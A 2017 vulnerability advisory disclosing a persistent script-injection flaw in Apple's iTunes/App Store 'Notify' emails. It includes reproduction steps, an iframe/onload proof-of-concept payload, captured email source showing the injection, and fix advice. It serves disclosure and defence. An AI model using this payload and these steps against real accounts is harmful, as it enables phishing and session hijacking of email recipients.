Document Title:
===============
Apple (iTunes Notify) - Bypass & Persistent Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2024

Followup ID: 654962036

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2016/12/22/apple-ios-102-notify-function-vulnerable-attacks-idevice-itunes-appstore


Release Date:
=============
2017-01-16


Vulnerability Laboratory ID (VL-ID):
====================================
2024


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
iOS is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating 
system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod touch.

(Copy of the Homepage: https://en.wikipedia.org/wiki/IOS )

iTunes is a media player, media library, online radio broadcaster, and mobile device management application developed by Apple Inc. 
It is used to play, download, and organize digital downloads of music and video (as well as other types of media available on the iTunes Store) 
on personal computers running the macOS and Microsoft Windows operating systems. The iTunes Store is also available on the iPhone, iPad, and iPod Touch.
Through the iTunes Store, users can purchase and download music, music videos, television shows, audiobooks, podcasts, movies, and movie rentals in some 
countries, and ringtones, available on the iPhone and iPod Touch (fourth generation onward). Application software for the iPhone, iPad and iPod Touch can 
be downloaded from the App Store. iTunes 12.5 is the most recent major version of iTunes, available for Mac OS X v10.9.5 or later and Windows 7 or later; 
it was released on September 13, 2016. iTunes 12.2 added Apple Music to the application, along with the Beats 1 radio station, and iTunes 12.5 offers a 
refinement of the Apple Music interface.

(Copy of the Homepage: https://en.wikipedia.org/wiki/ITunes )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability and mail encode issue in the official apple itunes online service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-12-15: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-12-16: Vendor Notification (Apple Product Security Team)
2016-12-16: Vendor Response/Feedback (Apple Product Security Team)
2017-**-**: Vendor Fix/Patch (Apple Cupertino Service Developer Team)
2017-**-**: Security Acknowledgements (Apple Product Security Team)
2017-01-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple
Product: iTunes & AppStore - Online Service (Web-Application) 2016 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability and mail encode issue has been discovered in the official apple itunes online service web-application.
The persistent vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable module or function.

The vulnerability is located in the new iTunes and Appstore `Notify` function for iOS 10 devices. The function does take the user credentials of the icloud or 
devicename values to perform the notify. The performed outgoing email of the new-itunes services has not parse mechanism for the user credentials streamed through 
the email client. Thus allows remote attackers to inject own malicious payloads to execute them within the introduction word line were the name is visible in the 
email body of the notify message. The request method is a sync via the device and the attack vector is persistent. The injection point are the user credentials of 
the `firstname` parameter and the execution point occurs in the outgoing email by the "@new.itunes.com" email sender. The same type of vulnerability has been 
disclosed already by our team in the invoices of the appstore and itunes in 2015. (Ref: https://www.vulnerability-lab.com/get_content.php?id=1512 )
The vulnerability can be exploited on restricted accessable ios devices to the main account holder inbox. 
The issue could be used as well to continue the calender spam activities.

The security risk of the persistent input validation and mail encoding web vulnerability is estimated as high with a cvss (common vulnerability scoring system) 
count of 3.8. Exploitation of the persistent input validation and mail encoding web vulnerability requires a low privilege apple (appstore/itunes) account and 
low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to 
external sources and persistent manipulation of affected or connected service module context

Vulnerable Module(s):
[+] Notify (New Function)

Vulnerable Paramter(s):
[+] firstname & name

Affected Module(s):
[+] Outgoing Service Notify Email Body

Affected Sender(s):
[+] do_not_reply@new.itunes.com


Proof of Concept (PoC):
=======================
The persistent input validation and mail encode vulnerability can be exploited by remote attackers with low privilege user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Payload(s)
>"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>


Manual steps to reproduce the vulnerability ... (via icloud on old entries)
1. First you need to have an exisiting account with a script code payload in the firstname and lastname
2. Login with the account and move into the idevice
3. Then open the itunes app or appstore app
4. Search for super mario run and the new notification button
5. Activate the activation button
Note: Now wait until the app is available because then you will receive a notify email with the name credentials
6. The email arrives to the inbox with manipulated credentials in the firstname and lastname of the email body introduction word "Hello"

Manual steps to reproduce the vulnerability ... (without icloud on new entries)
1. Change device name to a script code payload (exp ipad2)
2. Then move to the appstore or itunes app 
3. Search for super mario run and click to process the notification
4. In the moment the release becomes available an email will arrive with the values used by the device or account
5. The email arrives to the inbox with manipulated credentials in the firstname and lastname of the email body introduction word "Hello"

Note: The issue is similar to the already discovered itunes invoice vulnerbility exploited in 2015. The new.itunes.com service does 
not have the secure validation because it has implemented lately. Due to the taken values of the user account during the activate of 
the notify button the issue can be exploited. We prepared the exploitation already in september and got the confirm with the super 
mario run release in the eu around 15th.


PoC: Vulnerable Source (Email - )
<!-- end table containing Apple logo -->
<!-- begin table containing body copy -->
<table style="margin:0 auto" class="appl_100" width="600" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td class="appl_stack" valign="top" align="left">
<!-- begin table containing individual app -->
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td class="appl_app_txt" style="padding-bottom:14px;" align="left">
<div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida Sans,Lucida Sans Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;">
Hallo >"<iframe src="evil.source" onload="alert("ITUNESHACKWITHMARIO")">,
</div></td></tr>
<tr><td align="left" class="appl_app_txt" style="padding-bottom:14px;">
<div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida Sans,Lucida Sans Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;">
du wolltest benachrichtigt werden, wenn es soweit ist &ndash; &bdquo;Super Mario Run&ldquo; von Nintendo ist jetzt erh&auml;ltlich. Du kannst das Spiel im App Store 
auf deinem iPhone oder iPad laden.&nbsp;
<br/><br/><a href="http://new.itunes.com/r?v=2&la=de&lc=de&a=FOqorWUXVdIQSl%2BmwRhvEMkn5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=aI6r3a7q6p" 
style="color:#0088cc" class="appl-link">Jetzt laden</a>
<BR><BR>
Beste Gr&uuml;&szlig;e<br/>
Das App Store-Team


Vulnerable Email (Header)
Return-Path: <donotrep_nt_bounces@new.itunes.com>
------=_Part_10460774_1004383268.1481850993725
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hallo >"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>,
du wolltest benachrichtigt werden, wenn es soweit ist =E2=80=93 =E2=80=9ESu=
per Mario Run=E2=80=9C von Nintendo ist jetzt erh=C3=A4ltlich. Du kannst da=
s Spiel im App Store auf deinem iPhone oder iPad laden.=C2=A0

Jetzt laden
http://new.itunes.com/r?v=3D2&la=3Dde&lc=3Dde&a=3DFOqorWUXVdIQSl%2BmwRhvEMk=
n5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=3DaI6y6a2j9C

Beste Gr=C3=BC=C3=9Fe
Das App Store-Team


Reference(s):
https://itunes.apple.com/us/app/super-mario-run/id1145275343


Solution - Fix & Patch:
=======================
The vulnerability can be patched by the following solution steps ...
1. Disallow the usage of special chars for the name variable (firstname) to prevent the injection point.
2. Parse in the @new.itunes.com sender the outgoing name values to prevent the execution point.
3. Use only the icloud credentials were a secure protection on input has implemented during the time.


Security Risk:
==============
The security risk of the persistent validation web vulnerability and mail encode issue in the itunes notify function is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com     - www.vuln-lab.com             - www.evolution-sec.com
Section:    magazine.vulnerability-lab.com   - vulnerability-lab.com/contact.php         - evolution-sec.com/contact
Social:      twitter.com/vuln_lab    - facebook.com/VulnerabilityLab         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php   - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

            Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com